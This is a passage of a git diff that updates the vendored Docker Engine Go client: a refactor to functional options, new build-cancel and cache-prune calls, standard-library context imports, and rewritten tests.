-		fileStore:   NewFileStore(f),
-	}
-	err := s.Erase(validServerAddress)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if len(f.AuthConfigs) != 0 {
-		t.Fatalf("expected 0 auth configs, got %d", len(f.AuthConfigs))
-	}
-}
-
-func TestNativeStoreEraseInvalidAddress(t *testing.T) {
-	f := newConfigFile(map[string]types.AuthConfig{
-		validServerAddress: {
-			Email: "foo@example.com",
-		},
-	})
-	f.CredentialsStore = "mock"
-
-	s := &nativeStore{
-		programFunc: mockCommandFn,
-		fileStore:   NewFileStore(f),
-	}
-	err := s.Erase(invalidServerAddress)
-	if err == nil {
-		t.Fatal("expected error, got nil")
-	}
-
-	if !strings.Contains(err.Error(), "program failed") {
-		t.Fatalf("expected `program failed`, got %v", err)
-	}
-}
diff --git a/vendor/github.com/docker/docker/client/build_cancel.go b/vendor/github.com/docker/docker/client/build_cancel.go
new file mode 100644
index 0000000000..4cf8c980a9
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/build_cancel.go
@@ -0,0 +1,21 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"net/url"
+
+	"golang.org/x/net/context"
+)
+
+// BuildCancel requests the daemon to cancel ongoing build request
+func (cli *Client) BuildCancel(ctx context.Context, id string) error {
+	query := url.Values{}
+	query.Set("id", id)
+
+	serverResp, err := cli.post(ctx, "/build/cancel", query, nil, nil)
+	if err != nil {
+		return err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/client/build_prune.go b/vendor/github.com/docker/docker/client/build_prune.go
new file mode 100644
index 0000000000..c4772a04e7
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/build_prune.go
@@ -0,0 +1,30 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+)
+
+// BuildCachePrune requests the daemon to delete unused cache data
+func (cli *Client) BuildCachePrune(ctx context.Context) (*types.BuildCachePruneReport, error) {
+	if err := cli.NewVersionError("1.31", "build prune"); err != nil {
+		return nil, err
+	}
+
+	report := types.BuildCachePruneReport{}
+
+	serverResp, err := cli.post(ctx, "/build/prune", nil, nil, nil)
+	if err != nil {
+		return nil, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil {
+		return nil, fmt.Errorf("Error retrieving disk usage: %v", err)
+	}
+
+	return &report, nil
+}
diff --git a/vendor/github.com/docker/docker/client/checkpoint_create.go b/vendor/github.com/docker/docker/client/checkpoint_create.go
index 0effe498be..921024fe4f 100644
--- a/vendor/github.com/docker/docker/client/checkpoint_create.go
+++ b/vendor/github.com/docker/docker/client/checkpoint_create.go
@@ -1,8 +1,9 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
+
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // CheckpointCreate creates a checkpoint from the given container with the given name
diff --git a/vendor/github.com/docker/docker/client/checkpoint_create_test.go b/vendor/github.com/docker/docker/client/checkpoint_create_test.go
index 96e5187618..5703c21904 100644
--- a/vendor/github.com/docker/docker/client/checkpoint_create_test.go
+++ b/vendor/github.com/docker/docker/client/checkpoint_create_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func TestCheckpointCreateError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete.go b/vendor/github.com/docker/docker/client/checkpoint_delete.go
index e6e75588b1..54f55fa76e 100644
--- a/vendor/github.com/docker/docker/client/checkpoint_delete.go
+++ b/vendor/github.com/docker/docker/client/checkpoint_delete.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // CheckpointDelete deletes the checkpoint with the given name from the given container
diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete_test.go b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go
index a78b050487..117630d61a 100644
--- a/vendor/github.com/docker/docker/client/checkpoint_delete_test.go
+++ b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
@@ -9,7 +10,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func TestCheckpointDeleteError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/checkpoint_list.go b/vendor/github.com/docker/docker/client/checkpoint_list.go
index 8eb720a6b2..2b73fb553f 100644
--- a/vendor/github.com/docker/docker/client/checkpoint_list.go
+++ b/vendor/github.com/docker/docker/client/checkpoint_list.go
@@ -1,14 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
-// CheckpointList returns the volumes configured in the docker host.
+// CheckpointList returns the checkpoints of the given container in the docker host
 func (cli *Client) CheckpointList(ctx context.Context, container string, options types.CheckpointListOptions) ([]types.Checkpoint, error) {
 	var checkpoints []types.Checkpoint
 
@@ -19,7 +19,7 @@ func (cli *Client) CheckpointList(ctx context.Context, container string, options
 
 	resp, err := cli.get(ctx, "/containers/"+container+"/checkpoints", query, nil)
 	if err != nil {
-		return checkpoints, err
+		return checkpoints, wrapResponseError(err, resp, "container", container)
 	}
 
 	err = json.NewDecoder(resp.body).Decode(&checkpoints)
diff --git a/vendor/github.com/docker/docker/client/checkpoint_list_test.go b/vendor/github.com/docker/docker/client/checkpoint_list_test.go
index 6c90f61e8c..d5cfcda0e5 100644
--- a/vendor/github.com/docker/docker/client/checkpoint_list_test.go
+++ b/vendor/github.com/docker/docker/client/checkpoint_list_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func TestCheckpointListError(t *testing.T) {
@@ -55,3 +55,14 @@ func TestCheckpointList(t *testing.T) {
 		t.Fatalf("expected 1 checkpoint, got %v", checkpoints)
 	}
 }
+
+func TestCheckpointListContainerNotFound(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+	}
+
+	_, err := client.CheckpointList(context.Background(), "unknown", types.CheckpointListOptions{})
+	if err == nil || !IsErrNotFound(err) {
+		t.Fatalf("expected a containerNotFound error, got %v", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/client.go b/vendor/github.com/docker/docker/client/client.go
index a9bdab6bb6..b874b3b522 100644
--- a/vendor/github.com/docker/docker/client/client.go
+++ b/vendor/github.com/docker/docker/client/client.go
@@ -1,10 +1,6 @@
 /*
 Package client is a Go client for the Docker Engine API.
 
-The "docker" command uses this package to communicate with the daemon. It can also
-be used by your own Go applications to do anything the command-line interface does
-– running containers, pulling images, managing swarms, etc.
-
 For more information about the Engine API, see the documentation:
 https://docs.docker.com/engine/reference/api/
 
@@ -43,22 +39,29 @@ For example, to list running containers (the equivalent of "docker ps"):
 	}
 
 */
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"fmt"
+	"net"
 	"net/http"
 	"net/url"
 	"os"
+	"path"
 	"path/filepath"
 	"strings"
 
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions"
 	"github.com/docker/go-connections/sockets"
 	"github.com/docker/go-connections/tlsconfig"
+	"github.com/pkg/errors"
 )
 
-// DefaultVersion is the version of the current stable API
-const DefaultVersion string = "1.25"
+// ErrRedirect is the error returned by checkRedirect when the request is non-GET.
+var ErrRedirect = errors.New("unexpected redirect in response")
 
 // Client is the API client that performs all operations
 // against a docker server.
@@ -83,13 +86,39 @@ type Client struct {
 	manualOverride bool
 }
 
+// CheckRedirect specifies the policy for dealing with redirect responses:
+// If the request is non-GET return `ErrRedirect`. Otherwise use the last response.
+//
+// Go 1.8 changes behavior for HTTP redirects (specifically 301, 307, and 308) in the client .
+// The Docker client (and by extension docker API client) can be made to to send a request
+// like POST /containers//start where what would normally be in the name section of the URL is empty.
+// This triggers an HTTP 301 from the daemon.
+// In go 1.8 this 301 will be converted to a GET request, and ends up getting a 404 from the daemon.
+// This behavior change manifests in the client in that before the 301 was not followed and
+// the client did not generate an error, but now results in a message like Error response from daemon: page not found.
+func CheckRedirect(req *http.Request, via []*http.Request) error {
+	if via[0].Method == http.MethodGet {
+		return http.ErrUseLastResponse
+	}
+	return ErrRedirect
+}
+
 // NewEnvClient initializes a new API client based on environment variables.
-// Use DOCKER_HOST to set the url to the docker server.
-// Use DOCKER_API_VERSION to set the version of the API to reach, leave empty for latest.
-// Use DOCKER_CERT_PATH to load the tls certificates from.
-// Use DOCKER_TLS_VERIFY to enable or disable TLS verification, off by default.
+// See FromEnv for a list of support environment variables.
+//
+// Deprecated: use NewClientWithOpts(FromEnv)
 func NewEnvClient() (*Client, error) {
-	var client *http.Client
+	return NewClientWithOpts(FromEnv)
+}
+
+// FromEnv configures the client with values from environment variables.
+//
+// Supported environment variables:
+// DOCKER_HOST to set the url to the docker server.
+// DOCKER_API_VERSION to set the version of the API to reach, leave empty for latest.
+// DOCKER_CERT_PATH to load the TLS certificates from.
+// DOCKER_TLS_VERIFY to enable or disable TLS verification, off by default.
+func FromEnv(c *Client) error {
 	if dockerCertPath := os.Getenv("DOCKER_CERT_PATH"); dockerCertPath != "" {
 		options := tlsconfig.Options{
 			CAFile:             filepath.Join(dockerCertPath, "ca.pem"),
@@ -99,93 +128,178 @@ func NewEnvClient() (*Client, error) {
 		}
 		tlsc, err := tlsconfig.Client(options)
 		if err != nil {
-			return nil, err
+			return err
 		}
 
-		client = &http.Client{
-			Transport: &http.Transport{
-				TLSClientConfig: tlsc,
-			},
+		c.client = &http.Client{
+			Transport:     &http.Transport{TLSClientConfig: tlsc},
+			CheckRedirect: CheckRedirect,
 		}
 	}
 
-	host := os.Getenv("DOCKER_HOST")
-	if host == "" {
-		host = DefaultDockerHost
+	if host := os.Getenv("DOCKER_HOST"); host != "" {
+		if err := WithHost(host)(c); err != nil {
+			return err
+		}
 	}
-	version := os.Getenv("DOCKER_API_VERSION")
-	if version == "" {
-		version = DefaultVersion
+
+	if version := os.Getenv("DOCKER_API_VERSION"); version != "" {
+		c.version = version
+		c.manualOverride = true
 	}
+	return nil
+}
 
-	cli, err := NewClient(host, version, client, nil)
-	if err != nil {
-		return cli, err
+// WithTLSClientConfig applies a tls config to the client transport.
+func WithTLSClientConfig(cacertPath, certPath, keyPath string) func(*Client) error {
+	return func(c *Client) error {
+		opts := tlsconfig.Options{
+			CAFile:             cacertPath,
+			CertFile:           certPath,
+			KeyFile:            keyPath,
+			ExclusiveRootPools: true,
+		}
+		config, err := tlsconfig.Client(opts)
+		if err != nil {
+			return errors.Wrap(err, "failed to create tls config")
+		}
+		if transport, ok := c.client.Transport.(*http.Transport); ok {
+			transport.TLSClientConfig = config
+			return nil
+		}
+		return errors.Errorf("cannot apply tls config to transport: %T", c.client.Transport)
 	}
-	if os.Getenv("DOCKER_API_VERSION") != "" {
-		cli.manualOverride = true
+}
+
+// WithDialer applies the dialer.DialContext to the client transport. This can be
+// used to set the Timeout and KeepAlive settings of the client.
+func WithDialer(dialer *net.Dialer) func(*Client) error {
+	return func(c *Client) error {
+		if transport, ok := c.client.Transport.(*http.Transport); ok {
+			transport.DialContext = dialer.DialContext
+			return nil
+		}
+		return errors.Errorf("cannot apply dialer to transport: %T", c.client.Transport)
 	}
-	return cli, nil
 }
 
-// NewClient initializes a new API client for the given host and API version.
-// It uses the given http client as transport.
+// WithVersion overrides the client version with the specified one
+func WithVersion(version string) func(*Client) error {
+	return func(c *Client) error {
+		c.version = version
+		return nil
+	}
+}
+
+// WithHost overrides the client host with the specified one.
+func WithHost(host string) func(*Client) error {
+	return func(c *Client) error {
+		hostURL, err := ParseHostURL(host)
+		if err != nil {
+			return err
+		}
+		c.host = host
+		c.proto = hostURL.Scheme
+		c.addr = hostURL.Host
+		c.basePath = hostURL.Path
+		if transport, ok := c.client.Transport.(*http.Transport); ok {
+			return sockets.ConfigureTransport(transport, c.proto, c.addr)
+		}
+		return errors.Errorf("cannot apply host to transport: %T", c.client.Transport)
+	}
+}
+
+// WithHTTPClient overrides the client http client with the specified one
+func WithHTTPClient(client *http.Client) func(*Client) error {
+	return func(c *Client) error {
+		if client != nil {
+			c.client = client
+		}
+		return nil
+	}
+}
+
+// WithHTTPHeaders overrides the client default http headers
+func WithHTTPHeaders(headers map[string]string) func(*Client) error {
+	return func(c *Client) error {
+		c.customHTTPHeaders = headers
+		return nil
+	}
+}
+
+// NewClientWithOpts initializes a new API client with default values. It takes functors
+// to modify values when creating it, like `NewClientWithOpts(WithVersion(…))`
 // It also initializes the custom http headers to add to each request.
 //
 // It won't send any version information if the version number is empty. It is
 // highly recommended that you set a version or your client may break if the
 // server is upgraded.
-func NewClient(host string, version string, client *http.Client, httpHeaders map[string]string) (*Client, error) {
-	proto, addr, basePath, err := ParseHost(host)
+func NewClientWithOpts(ops ...func(*Client) error) (*Client, error) {
+	client, err := defaultHTTPClient(DefaultDockerHost)
 	if err != nil {
 		return nil, err
 	}
+	c := &Client{
+		host:    DefaultDockerHost,
+		version: api.DefaultVersion,
+		scheme:  "http",
+		client:  client,
+		proto:   defaultProto,
+		addr:    defaultAddr,
+	}
 
-	if client != nil {
-		if _, ok := client.Transport.(*http.Transport); !ok {
-			return nil, fmt.Errorf("unable to verify TLS configuration, invalid transport %v", client.Transport)
-		}
-	} else {
-		transport := new(http.Transport)
-		sockets.ConfigureTransport(transport, proto, addr)
-		client = &http.Client{
-			Transport: transport,
+	for _, op := range ops {
+		if err := op(c); err != nil {
+			return nil, err
 		}
 	}
 
-	scheme := "http"
-	tlsConfig := resolveTLSConfig(client.Transport)
+	if _, ok := c.client.Transport.(http.RoundTripper); !ok {
+		return nil, fmt.Errorf("unable to verify TLS configuration, invalid transport %v", c.client.Transport)
+	}
+	tlsConfig := resolveTLSConfig(c.client.Transport)
 	if tlsConfig != nil {
 		// TODO(stevvooe): This isn't really the right way to write clients in Go.
 		// `NewClient` should probably only take an `*http.Client` and work from there.
 		// Unfortunately, the model of having a host-ish/url-thingy as the connection
 		// string has us confusing protocol and transport layers. We continue doing
 		// this to avoid breaking existing clients but this should be addressed.
-		scheme = "https"
-	}
-
-	return &Client{
-		scheme:            scheme,
-		host:              host,
-		proto:             proto,
-		addr:              addr,
-		basePath:          basePath,
-		client:            client,
-		version:           version,
-		customHTTPHeaders: httpHeaders,
+		c.scheme = "https"
+	}
+
+	return c, nil
+}
+
+func defaultHTTPClient(host string) (*http.Client, error) {
+	url, err := ParseHostURL(host)
+	if err != nil {
+		return nil, err
+	}
+	transport := new(http.Transport)
+	sockets.ConfigureTransport(transport, url.Scheme, url.Host)
+	return &http.Client{
+		Transport:     transport,
+		CheckRedirect: CheckRedirect,
 	}, nil
 }
 
-// Close ensures that transport.Client is closed
-// especially needed while using NewClient with *http.Client = nil
-// for example
-// client.NewClient("unix:///var/run/docker.sock", nil, "v1.18", map[string]string{"User-Agent": "engine-api-cli-1.0"})
-func (cli *Client) Close() error {
+// NewClient initializes a new API client for the given host and API version.
+// It uses the given http client as transport.
+// It also initializes the custom http headers to add to each request.
+//
+// It won't send any version information if the version number is empty. It is
+// highly recommended that you set a version or your client may break if the
+// server is upgraded.
+// Deprecated: use NewClientWithOpts
+func NewClient(host string, version string, client *http.Client, httpHeaders map[string]string) (*Client, error) {
+	return NewClientWithOpts(WithHost(host), WithVersion(version), WithHTTPClient(client), WithHTTPHeaders(httpHeaders))
+}
 
+// Close the transport used by the client
+func (cli *Client) Close() error {
 	if t, ok := cli.client.Transport.(*http.Transport); ok {
 		t.CloseIdleConnections()
 	}
-
 	return nil
 }
 
@@ -195,41 +309,64 @@ func (cli *Client) getAPIPath(p string, query url.Values) string {
 	var apiPath string
 	if cli.version != "" {
 		v := strings.TrimPrefix(cli.version, "v")
-		apiPath = fmt.Sprintf("%s/v%s%s", cli.basePath, v, p)
+		apiPath = path.Join(cli.basePath, "/v"+v, p)
 	} else {
-		apiPath = fmt.Sprintf("%s%s", cli.basePath, p)
+		apiPath = path.Join(cli.basePath, p)
 	}
-
-	u := &url.URL{
-		Path: apiPath,
-	}
-	if len(query) > 0 {
-		u.RawQuery = query.Encode()
-	}
-	return u.String()
+	return (&url.URL{Path: apiPath, RawQuery: query.Encode()}).String()
 }
 
-// ClientVersion returns the version string associated with this
-// instance of the Client. Note that this value can be changed
-// via the DOCKER_API_VERSION env var.
+// ClientVersion returns the API version used by this client.
 func (cli *Client) ClientVersion() string {
 	return cli.version
 }
 
-// UpdateClientVersion updates the version string associated with this
-// instance of the Client.
-func (cli *Client) UpdateClientVersion(v string) {
-	if !cli.manualOverride {
-		cli.version = v
+// NegotiateAPIVersion queries the API and updates the version to match the
+// API version. Any errors are silently ignored.
+func (cli *Client) NegotiateAPIVersion(ctx context.Context) {
+	ping, _ := cli.Ping(ctx)
+	cli.NegotiateAPIVersionPing(ping)
+}
+
+// NegotiateAPIVersionPing updates the client version to match the Ping.APIVersion
+// if the ping version is less than the default version.
+func (cli *Client) NegotiateAPIVersionPing(p types.Ping) {
+	if cli.manualOverride {
+		return
 	}
 
+	// try the latest version before versioning headers existed
+	if p.APIVersion == "" {
+		p.APIVersion = "1.24"
+	}
+
+	// if the client is not initialized with a version, start with the latest supported version
+	if cli.version == "" {
+		cli.version = api.DefaultVersion
+	}
+
+	// if server version is lower than the client version, downgrade
+	if versions.LessThan(p.APIVersion, cli.version) {
+		cli.version = p.APIVersion
+	}
 }
 
-// ParseHost verifies that the given host strings is valid.
-func ParseHost(host string) (string, string, string, error) {
+// DaemonHost returns the host address used by the client
+func (cli *Client) DaemonHost() string {
+	return cli.host
+}
+
+// HTTPClient returns a copy of the HTTP client bound to the server
+func (cli *Client) HTTPClient() *http.Client {
+	return &*cli.client
+}
+
+// ParseHostURL parses a url string, validates the string is a host url, and
+// returns the parsed URL
+func ParseHostURL(host string) (*url.URL, error) {
 	protoAddrParts := strings.SplitN(host, "://", 2)
 	if len(protoAddrParts) == 1 {
-		return "", "", "", fmt.Errorf("unable to parse docker host `%s`", host)
+		return nil, fmt.Errorf("unable to parse docker host `%s`", host)
 	}
 
 	var basePath string
@@ -237,10 +374,29 @@ func ParseHost(host string) (string, string, string, error) {
 	if proto == "tcp" {
 		parsed, err := url.Parse("tcp://" + addr)
 		if err != nil {
-			return "", "", "", err
+			return nil, err
 		}
 		addr = parsed.Host
 		basePath = parsed.Path
 	}
-	return proto, addr, basePath, nil
+	return &url.URL{
+		Scheme: proto,
+		Host:   addr,
+		Path:   basePath,
+	}, nil
+}
+
+// CustomHTTPHeaders returns the custom http headers stored by the client.
+func (cli *Client) CustomHTTPHeaders() map[string]string {
+	m := make(map[string]string)
+	for k, v := range cli.customHTTPHeaders {
+		m[k] = v
+	}
+	return m
+}
+
+// SetCustomHTTPHeaders that will be set on every HTTP request made by the client.
+// Deprecated: use WithHTTPHeaders when creating the client.
+func (cli *Client) SetCustomHTTPHeaders(headers map[string]string) {
+	cli.customHTTPHeaders = headers
 }
diff --git a/vendor/github.com/docker/docker/client/client_mock_test.go b/vendor/github.com/docker/docker/client/client_mock_test.go
index 0ab935d536..390a1eed7d 100644
--- a/vendor/github.com/docker/docker/client/client_mock_test.go
+++ b/vendor/github.com/docker/docker/client/client_mock_test.go
@@ -1,4 +1,4 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
@@ -9,6 +9,14 @@ import (
 	"github.com/docker/docker/api/types"
 )
 
+// transportFunc allows us to inject a mock transport for testing. We define it
+// here so we can detect the tlsconfig and return nil for only this type.
+type transportFunc func(*http.Request) (*http.Response, error)
+
+func (tf transportFunc) RoundTrip(req *http.Request) (*http.Response, error) {
+	return tf(req)
+}
+
 func newMockClient(doer func(*http.Request) (*http.Response, error)) *http.Client {
 	return &http.Client{
 		Transport: transportFunc(doer),
diff --git a/vendor/github.com/docker/docker/client/client_test.go b/vendor/github.com/docker/docker/client/client_test.go
index ee199c2bec..58bccaa311 100644
--- a/vendor/github.com/docker/docker/client/client_test.go
+++ b/vendor/github.com/docker/docker/client/client_test.go
@@ -1,145 +1,115 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
-	"encoding/json"
-	"io/ioutil"
 	"net/http"
 	"net/url"
 	"os"
 	"runtime"
-	"strings"
 	"testing"
 
+	"github.com/docker/docker/api"
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/env"
+	"gotest.tools/skip"
 )
 
 func TestNewEnvClient(t *testing.T) {
-	if runtime.GOOS == "windows" {
-		t.Skip("skipping unix only test for windows")
-	}
-	cases := []struct {
+	skip.If(t, runtime.GOOS == "windows")
+
+	testcases := []struct {
+		doc             string
 		envs            map[string]string
 		expectedError   string
 		expectedVersion string
 	}{
 		{
+			doc:             "default api version",
 			envs:            map[string]string{},
-			expectedVersion: DefaultVersion,
+			expectedVersion: api.DefaultVersion,
 		},
 		{
+			doc: "invalid cert path",
 			envs: map[string]string{
 				"DOCKER_CERT_PATH": "invalid/path",
 			},
-			expectedError: "Could not load X509 key pair: open invalid/path/cert.pem: no such file or directory. Make sure the key is not encrypted",
+			expectedError: "Could not load X509 key pair: open invalid/path/cert.pem: no such file or directory",
 		},
 		{
+			doc: "default api version with cert path",
 			envs: map[string]string{
 				"DOCKER_CERT_PATH": "testdata/",
 			},
-			expectedVersion: DefaultVersion,
+			expectedVersion: api.DefaultVersion,
 		},
 		{
+			doc: "default api version with cert path and tls verify",
 			envs: map[string]string{
 				"DOCKER_CERT_PATH":  "testdata/",
 				"DOCKER_TLS_VERIFY": "1",
 			},
-			expectedVersion: DefaultVersion,
+			expectedVersion: api.DefaultVersion,
 		},
 		{
+			doc: "default api version with cert path and host",
 			envs: map[string]string{
 				"DOCKER_CERT_PATH": "testdata/",
 				"DOCKER_HOST":      "https://notaunixsocket",
 			},
-			expectedVersion: DefaultVersion,
+			expectedVersion: api.DefaultVersion,
 		},
 		{
+			doc: "invalid docker host",
 			envs: map[string]string{
 				"DOCKER_HOST": "host",
 			},
 			expectedError: "unable to parse docker host `host`",
 		},
 		{
+			doc: "invalid docker host, with good format",
 			envs: map[string]string{
 				"DOCKER_HOST": "invalid://url",
 			},
-			expectedVersion: DefaultVersion,
-		},
-		{
-			envs: map[string]string{
-				"DOCKER_API_VERSION": "anything",
-			},
-			expectedVersion: "anything",
+			expectedVersion: api.DefaultVersion,
 		},
 		{
+			doc: "override api version",
 			envs: map[string]string{
 				"DOCKER_API_VERSION": "1.22",
 			},
 			expectedVersion: "1.22",
 		},
 	}
-	for _, c := range cases {
-		recoverEnvs := setupEnvs(t, c.envs)
+
+	defer env.PatchAll(t, nil)()
+	for _, c := range testcases {
+		env.PatchAll(t, c.envs)
 		apiclient, err := NewEnvClient()
 		if c.expectedError != "" {
-			if err == nil {
-				t.Errorf("expected an error for %v", c)
-			} else if err.Error() != c.expectedError {
-				t.Errorf("expected an error %s, got %s, for %v", c.expectedError, err.Error(), c)
-			}
+			assert.Check(t, is.Error(err, c.expectedError), c.doc)
 		} else {
-			if err != nil {
-				t.Error(err)
-			}
+			assert.Check(t, err, c.doc)
 			version := apiclient.ClientVersion()
-			if version != c.expectedVersion {
-				t.Errorf("expected %s, got %s, for %v", c.expectedVersion, version, c)
-			}
+			assert.Check(t, is.Equal(c.expectedVersion, version), c.doc)
 		}
 
 		if c.envs["DOCKER_TLS_VERIFY"] != "" {
 			// pedantic checking that this is handled correctly
 			tr := apiclient.client.Transport.(*http.Transport)
-			if tr.TLSClientConfig == nil {
-				t.Errorf("no tls config found when DOCKER_TLS_VERIFY enabled")
-			}
-
-			if tr.TLSClientConfig.InsecureSkipVerify {
-				t.Errorf("tls verification should be enabled")
-			}
-		}
-
-		recoverEnvs(t)
-	}
-}
-
-func setupEnvs(t *testing.T, envs map[string]string) func(*testing.T) {
-	oldEnvs := map[string]string{}
-	for key, value := range envs {
-		oldEnv := os.Getenv(key)
-		oldEnvs[key] = oldEnv
-		err := os.Setenv(key, value)
-		if err != nil {
-			t.Error(err)
-		}
-	}
-	return func(t *testing.T) {
-		for key, value := range oldEnvs {
-			err := os.Setenv(key, value)
-			if err != nil {
-				t.Error(err)
-			}
+			assert.Assert(t, tr.TLSClientConfig != nil, c.doc)
+			assert.Check(t, is.Equal(tr.TLSClientConfig.InsecureSkipVerify, false), c.doc)
 		}
 	}
 }
 
 func TestGetAPIPath(t *testing.T) {
-	cases := []struct {
-		v string
-		p string
-		q url.Values
-		e string
+	testcases := []struct {
+		version  string
+		path     string
+		query    url.Values
+		expected string
 	}{
 		{"", "/containers/json", nil, "/containers/json"},
 		{"", "/containers/json", url.Values{}, "/containers/json"},
@@ -153,118 +123,63 @@ func TestGetAPIPath(t *testing.T) {
 		{"v1.22", "/networks/kiwl$%^", nil, "/v1.22/networks/kiwl$%25%5E"},
 	}
 
-	for _, cs := range cases {
-		c, err := NewClient("unix:///var/run/docker.sock", cs.v, nil, nil)
-		if err != nil {
-			t.Fatal(err)
-		}
-		g := c.getAPIPath(cs.p, cs.q)
-		if g != cs.e {
-			t.Fatalf("Expected %s, got %s", cs.e, g)
-		}
-
-		err = c.Close()
-		if nil != err {
-			t.Fatalf("close client failed, error message: %s", err)
-		}
-	}
-}
-
-func TestParseHost(t *testing.T) {
-	cases := []struct {
-		host  string
-		proto string
-		addr  string
-		base  string
-		err   bool
-	}{
-		{"", "", "", "", true},
-		{"foobar", "", "", "", true},
-		{"foo://bar", "foo", "bar", "", false},
-		{"tcp://localhost:2476", "tcp", "localhost:2476", "", false},
-		{"tcp://localhost:2476/path", "tcp", "localhost:2476", "/path", false},
-	}
-
-	for _, cs := range cases {
-		p, a, b, e := ParseHost(cs.host)
-		if cs.err && e == nil {
-			t.Fatalf("expected error, got nil")
-		}
-		if !cs.err && e != nil {
-			t.Fatal(e)
-		}
-		if cs.proto != p {
-			t.Fatalf("expected proto %s, got %s", cs.proto, p)
-		}
-		if cs.addr != a {
-			t.Fatalf("expected addr %s, got %s", cs.addr, a)
-		}
-		if cs.base != b {
-			t.Fatalf("expected base %s, got %s", cs.base, b)
-		}
+	for _, testcase := range testcases {
+		c := Client{version: testcase.version, basePath: "/"}
+		actual := c.getAPIPath(testcase.path, testcase.query)
+		assert.Check(t, is.Equal(actual, testcase.expected))
 	}
 }
 
-func TestUpdateClientVersion(t *testing.T) {
-	client := &Client{
-		client: newMockClient(func(req *http.Request) (*http.Response, error) {
-			splitQuery := strings.Split(req.URL.Path, "/")
-			queryVersion := splitQuery[1]
-			b, err := json.Marshal(types.Version{
-				APIVersion: queryVersion,
-			})
-			if err != nil {
-				return nil, err
-			}
-			return &http.Response{
-				StatusCode: http.StatusOK,
-				Body:       ioutil.NopCloser(bytes.NewReader(b)),
-			}, nil
-		}),
-	}
-
-	cases := []struct {
-		v string
+func TestParseHostURL(t *testing.T) {
+	testcases := []struct {
+		host        string
+		expected    *url.URL
+		expectedErr string
 	}{
-		{"1.20"},
-		{"v1.21"},
-		{"1.22"},
-		{"v1.22"},
+		{
+			host:        "",
+			expectedErr: "unable to parse docker host",
+		},
+		{
+			host:        "foobar",
+			expectedErr: "unable to parse docker host",
+		},
+		{
+			host:     "foo://bar",
+			expected: &url.URL{Scheme: "foo", Host: "bar"},
+		},
+		{
+			host:     "tcp://localhost:2476",
+			expected: &url.URL{Scheme: "tcp", Host: "localhost:2476"},
+		},
+		{
+			host:     "tcp://localhost:2476/path",
+			expected: &url.URL{Scheme: "tcp", Host: "localhost:2476", Path: "/path"},
+		},
 	}
 
-	for _, cs := range cases {
-		client.UpdateClientVersion(cs.v)
-		r, err := client.ServerVersion(context.Background())
-		if err != nil {
-			t.Fatal(err)
-		}
-		if strings.TrimPrefix(r.APIVersion, "v") != strings.TrimPrefix(cs.v, "v") {
-			t.Fatalf("Expected %s, got %s", cs.v, r.APIVersion)
+	for _, testcase := range testcases {
+		actual, err := ParseHostURL(testcase.host)
+		if testcase.expectedErr != "" {
+			assert.Check(t, is.ErrorContains(err, testcase.expectedErr))
 		}
+		assert.Check(t, is.DeepEqual(testcase.expected, actual))
 	}
 }
 
 func TestNewEnvClientSetsDefaultVersion(t *testing.T) {
-	// Unset environment variables
-	envVarKeys := []string{
-		"DOCKER_HOST",
-		"DOCKER_API_VERSION",
-		"DOCKER_TLS_VERIFY",
-		"DOCKER_CERT_PATH",
-	}
-	envVarValues := make(map[string]string)
-	for _, key := range envVarKeys {
-		envVarValues[key] = os.Getenv(key)
-		os.Setenv(key, "")
-	}
+	defer env.PatchAll(t, map[string]string{
+		"DOCKER_HOST":        "",
+		"DOCKER_API_VERSION": "",
+		"DOCKER_TLS_VERIFY":  "",
+		"DOCKER_CERT_PATH":   "",
+	})()
 
 	client, err := NewEnvClient()
 	if err != nil {
 		t.Fatal(err)
 	}
-	if client.version != DefaultVersion {
-		t.Fatalf("Expected %s, got %s", DefaultVersion, client.version)
-	}
